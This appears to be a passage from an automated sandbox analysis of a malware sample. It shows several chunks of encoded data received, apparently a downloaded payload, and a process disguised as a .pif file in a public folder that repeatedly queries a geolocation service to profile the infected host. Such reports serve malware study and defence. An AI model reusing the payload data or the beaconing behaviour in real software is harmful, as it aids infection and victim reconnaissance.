                                                                                                                                                                        2025-01-06 06:53:18 UTC8000INData Raw: 6e 6d 63 68 6e 6b 56 55 73 58 53 59 6b 39 79 6f 55 4b 77 51 69 35 77 62 4e 71 57 4c 33 4d 7a 39 33 6b 6a 49 31 4c 69 51 6d 4e 33 72 65 65 58 36 41 6b 57 74 6d 47 42 48 6b 34 69 31 78 47 4c 57 63 6e 33 68 65 36 78 77 38 75 79 37 77 4a 43 5a 4d 4d 56 42 4b 6e 75 56 47 51 56 43 37 2b 4c 76 46 4b 4d 38 34 72 41 38 77 4e 4e 47 4b 46 62 57 65 30 42 31 4e 6c 4c 62 4a 6d 4d 77 4c 34 66 32 57 6d 30 49 41 79 56 31 6a 63 55 51 34 59 38 4a 61 78 4c 73 6d 4a 73 58 6e 57 71 70 61 68 4a 56 64 59 42 67 45 34 5a 55 72 70 61 42 6e 7a 4d 38 58 77 45 36 46 33 53 39 31 54 39 63 6f 53 5a 66 42 78 66 77 67 35 49 5a 75 52 55 4b 73 58 51 4a 57 4c 6f 35 33 47 37 74 5a 4f 46 78 48 6e 33 74 6b 6c 2b 37 58 6d 71 4e 53 54 6b 42 64 4a 43 59 4d 6d 4a 44 48 61 34 77 65 33 52 36 57 37 59
                                                                                                                                                                        Data Ascii: nmchnkVUsXSYk9yoUKwQi5wbNqWL3Mz93kjI1LiQmN3reeX6AkWtmGBHk4i1xGLWcn3he6xw8uy7wJCZMMVBKnuVGQVC7+LvFKM84rA8wNNGKFbWe0B1NlLbJmMwL4f2Wm0IAyV1jcUQ4Y8JaxLsmJsXnWqpahJVdYBgE4ZUrpaBnzM8XwE6F3S91T9coSZfBxfwg5IZuRUKsXQJWLo53G7tZOFxHn3tkl+7XmqNSTkBdJCYMmJDHa4we3R6W7Y
                                                                                                                                                                        2025-01-06 06:53:18 UTC8000INData Raw: 78 51 38 77 59 2b 54 71 69 36 73 49 33 37 63 4e 56 4c 70 55 5a 63 46 50 43 6b 47 58 42 47 43 51 6d 54 54 6b 6c 68 49 4a 44 2b 47 4d 4d 57 73 72 49 4e 49 75 30 74 6e 69 76 52 48 72 50 65 49 2b 4a 73 69 45 62 54 67 45 68 37 59 57 4a 42 70 47 6b 63 4e 6e 55 64 39 45 68 78 64 42 73 73 63 6b 51 75 68 71 4f 79 6e 76 48 77 6d 43 63 6a 77 50 49 45 71 73 70 6e 35 67 7a 37 6c 46 76 4f 52 31 6e 59 35 6a 48 66 30 64 41 58 38 74 59 31 4b 2f 64 4b 4e 65 69 73 36 53 5a 57 69 57 78 6a 61 6e 6b 47 42 6b 52 2f 55 43 49 6f 2b 56 55 78 56 71 54 34 45 57 79 57 70 6a 30 33 47 6c 39 54 44 53 6e 48 57 74 6b 42 36 46 53 73 56 41 48 30 43 78 38 36 52 54 37 7a 6a 6f 5a 46 73 66 4a 5a 36 41 50 58 35 67 44 4d 63 77 45 30 45 41 65 51 36 35 37 6a 32 44 6b 49 33 47 63 63 47 44 6c 33 2b
                                                                                                                                                                        Data Ascii: xQ8wY+Tqi6sI37cNVLpUZcFPCkGXBGCQmTTklhIJD+GMMWsrINIu0tnivRHrPeI+JsiEbTgEh7YWJBpGkcNnUd9EhxdBssckQuhqOynvHwmCcjwPIEqspn5gz7lFvOR1nY5jHf0dAX8tY1K/dKNeis6SZWiWxjankGBkR/UCIo+VUxVqT4EWyWpj03Gl9TDSnHWtkB6FSsVAH0Cx86RT7zjoZFsfJZ6APX5gDMcwE0EAeQ657j2DkI3GccGDl3+
                                                                                                                                                                        2025-01-06 06:53:19 UTC8000INData Raw: 6d 75 47 52 4e 77 65 50 69 42 51 5a 57 71 51 49 66 6f 45 30 32 44 32 52 66 4a 43 54 74 75 6b 64 31 6e 30 53 77 6e 63 66 77 38 52 46 6b 43 59 6f 79 78 66 7a 53 51 67 30 64 6b 6d 4c 4f 65 6e 67 32 4f 30 74 75 70 66 49 37 6b 37 52 6a 39 69 46 69 51 6b 47 73 6d 50 34 70 72 71 57 78 49 79 4b 63 6b 51 36 67 56 5a 32 2f 6a 2f 7a 64 74 43 4c 33 77 6b 64 56 38 78 44 56 37 44 33 59 48 58 62 6d 34 4a 64 54 35 48 49 56 75 34 53 4f 58 59 6f 49 36 79 75 39 54 78 6b 6c 4d 77 64 63 71 76 54 35 51 75 54 4a 5a 47 72 46 72 5a 4d 51 39 73 6e 7a 77 33 67 65 6e 51 2f 54 79 42 62 6b 79 42 68 45 48 50 67 6a 79 65 43 31 6f 74 44 58 64 42 4c 63 48 73 49 4f 79 6a 46 63 2b 4b 4b 6c 43 38 72 78 74 49 55 33 4f 67 36 30 32 4c 7a 61 6a 61 58 7a 53 66 4a 4e 62 46 72 53 4c 43 32 57 37 49
                                                                                                                                                                        Data Ascii: muGRNwePiBQZWqQIfoE02D2RfJCTtukd1n0Swncfw8RFkCYoyxfzSQg0dkmLOeng2O0tupfI7k7Rj9iFiQkGsmP4prqWxIyKckQ6gVZ2/j/zdtCL3wkdV8xDV7D3YHXbm4JdT5HIVu4SOXYoI6yu9TxklMwdcqvT5QuTJZGrFrZMQ9snzw3genQ/TyBbkyBhEHPgjyeC1otDXdBLcHsIOyjFc+KKlC8rxtIU3Og602LzajaXzSfJNbFrSLC2W7I
                                                                                                                                                                        2025-01-06 06:53:19 UTC8000INData Raw: 4a 66 44 45 44 32 37 6d 32 4a 62 7a 41 42 73 6e 66 71 31 63 64 62 35 79 7a 47 37 66 6d 66 69 33 46 79 52 30 57 67 64 56 42 46 63 45 76 5a 31 4a 48 49 41 7a 6b 56 64 47 63 44 49 53 53 42 79 6d 64 69 6d 76 35 61 6c 32 44 58 4b 6f 6c 76 78 78 68 7a 52 38 35 64 79 68 55 74 77 44 35 39 6a 58 31 61 50 36 4f 31 31 42 66 42 65 4a 49 33 6c 47 49 42 6c 55 73 45 70 77 78 4a 69 5a 4f 4d 43 41 6b 4a 6c 50 4f 51 53 2b 59 46 34 38 68 79 55 6f 41 4d 4e 4c 72 56 48 2f 63 72 64 4e 59 58 6e 65 79 63 62 31 4f 6c 62 67 51 76 2f 4e 59 63 43 59 6b 69 75 7a 4d 61 78 4c 4e 70 2f 2b 51 4d 69 58 4b 56 6a 55 72 34 76 49 72 4b 45 75 34 33 6a 76 4b 6e 2b 39 45 59 36 33 31 74 70 32 61 4c 6c 76 56 54 45 5a 69 6f 64 75 6c 75 49 2b 66 4e 30 33 75 38 47 64 6c 74 6d 64 2f 46 62 4d 57 53 54
                                                                                                                                                                        Data Ascii: JfDED27m2JbzABsnfq1cdb5yzG7fmfi3FyR0WgdVBFcEvZ1JHIAzkVdGcDISSBymdimv5al2DXKolvxxhzR85dyhUtwD59jX1aP6O11BfBeJI3lGIBlUsEpwxJiZOMCAkJlPOQS+YF48hyUoAMNLrVH/crdNYXneycb1OlbgQv/NYcCYkiuzMaxLNp/+QMiXKVjUr4vIrKEu43jvKn+9EY631tp2aLlvVTEZioduluI+fN03u8Gdltmd/FbMWST
                                                                                                                                                                        2025-01-06 06:53:19 UTC8000INData Raw: 37 47 45 55 6a 34 71 67 33 56 65 6e 4f 37 66 69 66 59 4b 6c 52 62 4d 6d 4c 31 34 34 78 61 41 6c 74 49 71 38 33 4e 51 75 4c 4f 72 72 78 4f 6a 34 74 59 30 37 4c 38 66 71 41 68 65 4f 6a 44 7a 73 47 53 43 43 57 67 37 55 69 45 71 39 48 56 39 7a 55 32 38 6f 4a 4c 72 68 61 54 2b 30 6f 52 30 6b 37 6c 36 32 65 6a 39 6c 43 64 74 46 66 50 64 71 67 4a 53 45 48 74 33 30 4e 44 43 70 48 63 5a 75 44 47 67 4c 68 75 50 57 57 66 79 6b 71 6a 4d 43 2b 43 50 73 52 55 68 50 52 31 70 54 6d 76 78 78 6a 49 52 4f 55 6c 78 58 6d 6f 55 44 55 6f 62 42 4e 43 44 2f 68 71 4a 6c 77 4e 6a 57 68 38 45 53 36 43 4d 77 4c 4d 41 6e 4b 75 6f 71 30 75 41 55 43 78 73 66 4d 53 4f 33 59 2f 72 52 61 4c 6c 57 64 31 78 73 2f 30 32 35 45 34 57 6c 6d 4a 78 4e 52 7a 4d 7a 53 4a 51 76 57 31 74 57 62 39 4d
                                                                                                                                                                        Data Ascii: 7GEUj4qg3VenO7fifYKlRbMmL144xaAltIq83NQuLOrrxOj4tY07L8fqAheOjDzsGSCCWg7UiEq9HV9zU28oJLrhaT+0oR0k7l62ej9lCdtFfPdqgJSEHt30NDCpHcZuDGgLhuPWWfykqjMC+CPsRUhPR1pTmvxxjIROUlxXmoUDUobBNCD/hqJlwNjWh8ES6CMwLMAnKuoq0uAUCxsfMSO3Y/rRaLlWd1xs/025E4WlmJxNRzMzSJQvW1tWb9M
                                                                                                                                                                        2025-01-06 06:53:19 UTC8000INData Raw: 36 70 52 56 46 39 63 6a 34 57 31 69 72 6c 53 59 6b 39 68 59 37 78 56 68 7a 36 59 78 74 44 58 34 53 44 37 59 48 6c 59 54 44 43 2b 49 6f 48 6f 74 69 4d 65 4d 4f 70 4c 6d 2b 70 74 4c 30 77 37 64 45 51 7a 45 73 78 33 75 31 76 6d 35 4e 7a 6b 65 72 38 67 63 70 6e 66 72 6e 59 49 7a 4a 38 50 6a 6d 79 6a 44 47 47 65 62 31 42 6c 72 2f 67 58 47 69 54 4b 74 46 6f 6a 77 31 6c 64 74 6c 6c 5a 78 71 34 50 34 4c 53 71 49 50 68 78 72 70 51 6d 67 73 4f 4f 76 4f 6c 4b 64 71 52 7a 59 54 45 30 62 39 52 63 6d 4f 45 35 6f 7a 49 67 47 41 69 61 4d 33 58 56 53 62 2f 64 72 62 4a 69 54 78 2f 47 71 47 55 79 51 6d 5a 33 64 62 76 49 63 51 7a 73 4f 7a 66 2b 6e 51 4c 78 47 74 49 41 6c 4d 59 66 79 6e 6a 6f 6a 37 62 4e 50 68 7a 6a 43 47 42 6c 4f 78 72 45 35 32 78 55 6f 30 45 44 53 63 7a 30
                                                                                                                                                                        Data Ascii: 6pRVF9cj4W1irlSYk9hY7xVhz6YxtDX4SD7YHlYTDC+IoHotiMeMOpLm+ptL0w7dEQzEsx3u1vm5Nzker8gcpnfrnYIzJ8PjmyjDGGeb1Blr/gXGiTKtFojw1ldtllZxq4P4LSqIPhxrpQmgsOOvOlKdqRzYTE0b9RcmOE5ozIgGAiaM3XVSb/drbJiTx/GqGUyQmZ3dbvIcQzsOzf+nQLxGtIAlMYfynjoj7bNPhzjCGBlOxrE52xUo0EDScz0
                                                                                                                                                                        2025-01-06 06:53:19 UTC8000INData Raw: 34 38 5a 35 39 77 59 42 66 56 47 47 55 67 33 70 71 2f 44 62 38 76 54 4b 76 47 4d 53 41 30 58 57 59 47 45 72 54 70 76 31 55 45 79 51 6d 62 62 50 4a 39 36 42 72 76 39 6d 47 68 53 58 4e 33 4e 2f 32 76 6e 62 45 57 73 74 64 61 6e 52 33 34 62 6d 59 38 58 4d 37 43 74 41 32 33 39 6d 41 55 54 44 46 51 69 37 67 73 76 73 57 4a 69 53 6d 33 49 6b 49 39 49 48 61 32 39 77 4a 71 50 55 5a 54 41 4d 36 42 4d 5a 6c 75 58 34 67 2b 4b 75 6e 4b 59 68 32 2f 79 4e 46 4b 78 31 31 71 54 2b 36 75 39 2b 39 30 72 47 57 43 59 66 6a 68 43 67 47 4a 7a 5a 72 53 68 52 51 41 76 62 64 4b 54 64 73 39 44 31 6d 2b 4d 71 6e 2f 5a 66 7a 75 48 55 57 46 57 72 78 69 6b 62 36 52 34 7a 4e 42 41 78 4f 57 6c 58 4f 34 68 51 62 4f 38 71 6e 5a 6a 47 31 4d 71 76 57 2f 4d 52 42 6f 70 31 55 54 32 6a 56 65 4b
                                                                                                                                                                        Data Ascii: 48Z59wYBfVGGUg3pq/Db8vTKvGMSA0XWYGErTpv1UEyQmbbPJ96Brv9mGhSXN3N/2vnbEWstdanR34bmY8XM7CtA239mAUTDFQi7gsvsWJiSm3IkI9IHa29wJqPUZTAM6BMZluX4g+KunKYh2/yNFKx11qT+6u9+90rGWCYfjhCgGJzZrShRQAvbdKTds9D1m+Mqn/ZfzuHUWFWrxikb6R4zNBAxOWlXO4hQbO8qnZjG1MqvW/MRBop1UT2jVeK


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        1192.168.2.449754188.114.96.34438112C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2025-01-06 06:53:26 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        2025-01-06 06:53:27 UTC855INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:27 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Age: 1461196
                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GQYA74Emnvgx4fgfPceDpY4FAU72XZxy8UN5y%2FdZFvMrOxAcpOh1gErOG3Sdm5LHFzjGj%2BR54xMBOuzY%2FURlSeFEqnjH14bkKUbwZH1p7AGJs7rqy3abyBoO2GxrzOnK3l1DQmpA"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8fd9ca8409af7c6c-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1948&min_rtt=1941&rtt_var=743&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1458541&cwnd=196&unsent_bytes=0&cid=7bcf6482e2a2a332&ts=171&x=0"
                                                                                                                                                                        2025-01-06 06:53:27 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        2192.168.2.449755188.114.96.34438112C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2025-01-06 06:53:27 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                                        2025-01-06 06:53:27 UTC865INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:27 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Age: 1461197
                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QMV%2FJBt4PTLSz%2FJ%2BwjTE%2FlGYhnrHuDPu2XylWv56y%2FYXSEl674RZDxCqrhFHkOdIgFJqIpZv%2BCmahfxGQ51xx9jNms7Tk0IuHGETdUlJHHc8Jr6%2BFX6g0ITe%2BZCcyNZ4uyxIISmA"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8fd9ca89396742d3-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1763&min_rtt=1757&rtt_var=671&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1615938&cwnd=246&unsent_bytes=0&cid=41ae7dd0734f3146&ts=140&x=0"
                                                                                                                                                                        2025-01-06 06:53:27 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        3192.168.2.449757188.114.96.34438112C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2025-01-06 06:53:28 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        2025-01-06 06:53:29 UTC859INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:29 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Age: 1461198
                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VHfNdbZOnq%2BpJDmpwMdNBAz%2F4vxybzE9Axneq1WOOmHAzQ%2BMTK5MFKp7EhBSvzOmK3MdGGwZPGdhV0MYQsreZwpiIbwqJHFDyhtugza%2FavCLcC9TQumfJKLENU97J%2FrPayaPoHGd"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8fd9ca90de128c4b-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1984&min_rtt=1975&rtt_var=760&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1422308&cwnd=232&unsent_bytes=0&cid=9a19e67bee1fced3&ts=155&x=0"
                                                                                                                                                                        2025-01-06 06:53:29 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        4192.168.2.449759188.114.96.34438112C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2025-01-06 06:53:30 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                                        2025-01-06 06:53:30 UTC855INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:30 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Age: 1461200
                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qrQzBTyI4OugniH3i%2BYoU5AqSxrDi2OXf2VEZV6xeaaAxJbSGn5woIxuqV3LZfOqF8ZAIZl8or9vq1Joj5Of%2FeMCI99GWrF%2BAoiKonsBIefEdXJl9J4GguQe7S7WMH79D0cwYhtA"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8fd9ca9c291843c3-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1572&min_rtt=1568&rtt_var=597&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1817050&cwnd=211&unsent_bytes=0&cid=365937ec4a19261e&ts=156&x=0"
                                                                                                                                                                        2025-01-06 06:53:30 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        5192.168.2.449762188.114.96.34438112C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2025-01-06 06:53:32 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                                        2025-01-06 06:53:32 UTC851INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:32 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Age: 1461202
                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hg5fgBqmJI9BXATHI3rfm3PrFgXs00Im6yQfk6vv76rPyvNd89uouyoFCfJhYk0fGFNYCME1QyTSB7RMEgTr%2FTnrSbH3EfkiWbG9ZEw0gfsOWNS1SE0wV8cKx5sHugXf9rCxtBOE"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8fd9caa85900186d-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1663&min_rtt=1650&rtt_var=645&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1662870&cwnd=250&unsent_bytes=0&cid=d5157c6751ad2942&ts=147&x=0"
                                                                                                                                                                        2025-01-06 06:53:32 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        6192.168.2.449764188.114.96.34438112C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2025-01-06 06:53:34 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                        Host: reallyfreegeoip.org
